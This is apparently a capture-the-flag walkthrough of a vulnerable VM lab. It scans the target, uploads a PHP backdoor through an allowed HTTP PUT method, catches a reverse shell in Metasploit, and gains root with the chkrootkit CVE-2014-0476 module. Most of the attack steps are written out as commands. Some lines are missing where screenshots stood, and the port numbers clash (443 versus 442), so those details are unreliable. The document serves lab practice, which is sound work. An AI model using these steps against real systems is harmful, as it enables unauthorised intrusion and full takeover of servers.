This machine can be downloaded from:
Set the Network adapter to NAT if you are using VMware.
Scan for local IP via netdiscover command:
It may different in your lab,
Scan the IP target with nmap as default:
nmap -A -vv -T4 192.168.236.136
We detect two ports are open 22/tcp and 80/tcp
Scan all TCP ports and for faster usage we can use zenmap:
Type zenmap to open zenmap tool
Type the IP in target: 192.168.236.136
Choose from profile: Intense scan, all TCP ports
As showing in screen shot:
nmap -p 1-65535 -T4 -A -v 192.168.236.136
Scan all UDP ports
We didn’t find useful ports from UDP scan, So we go back to TCP scan.
After we determined the target has 80 port is open so we will browse it.
We run nikto -h to scan the web and detect directory in that host:
nikto -h 192.168.236.136
After there is now useful result we run dirbuster with medium word-list
dirubuster to find directories in different tool,
Then we detect “test” directory let’s open it in browser
Let’s analyze the page and open view source,
nothing useful, So we can analyze the server side command either via burpsuite or via curl command and use OPTIONS to determine web functions are allowed
After we detect that PUT command is allowed, we can put our shell either via burpsuite or via Nmap,
Let us generate shell first
I use ready shell in kali by default using:
Copy shell and rename it as shell.php
cp /usr/share/webshells/php/php-backdoor.php /root/shell.php
Edit the shell.php via command:
>> kali IP
>> because 4444 isn’t working
nmap -p 80 192.168.236.136 –script http-put –script-args http-put.url=’/test/shell.php’,http-put.file=’shell.php’
Now we have to make listener, in two different way nc -lvp 443 or metasploit but i prefer metasploit for Privilege Escalation later,
We use payload php/reverse_php because we generate shell no meterpreter and that works for me,
Set local host (kali IP) and port (443) as we did in shell previously.
Then we type exploit (-jz) to work session in background.
set payload php/reverse_php
set LPORT 442
Then we move to this shell via browser:
Finally we got a user shell!
But with normal user www-data
For Privilege Escalation first we check the current process running and has root privileges:
We saw that linechkrootkit has root privileges,
drwxr-xr-x 2 john john 4096 Apr 12 2016 chkrootkit-0.49
After figure out for vulnerability in Google we discovered:
vulnerability of chkrootkit CVE-2014-0476
this could allow me to escalate my privilge.
with metasploit module.
After enter following command as shown in given image to load exploit/unix/local/chkrootkit module then set session 1 and arbitrary lport such a 8080 and run the module.
for me i set session 3 because i already opened sessions 1 and 2.
Make sure about lport with options command:
Then type run
session 4 opened ! in my case,
To see the privilege account
Now we are root!
open the 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt text for final flag:
I Hope you enjoy it!
contact me twitter: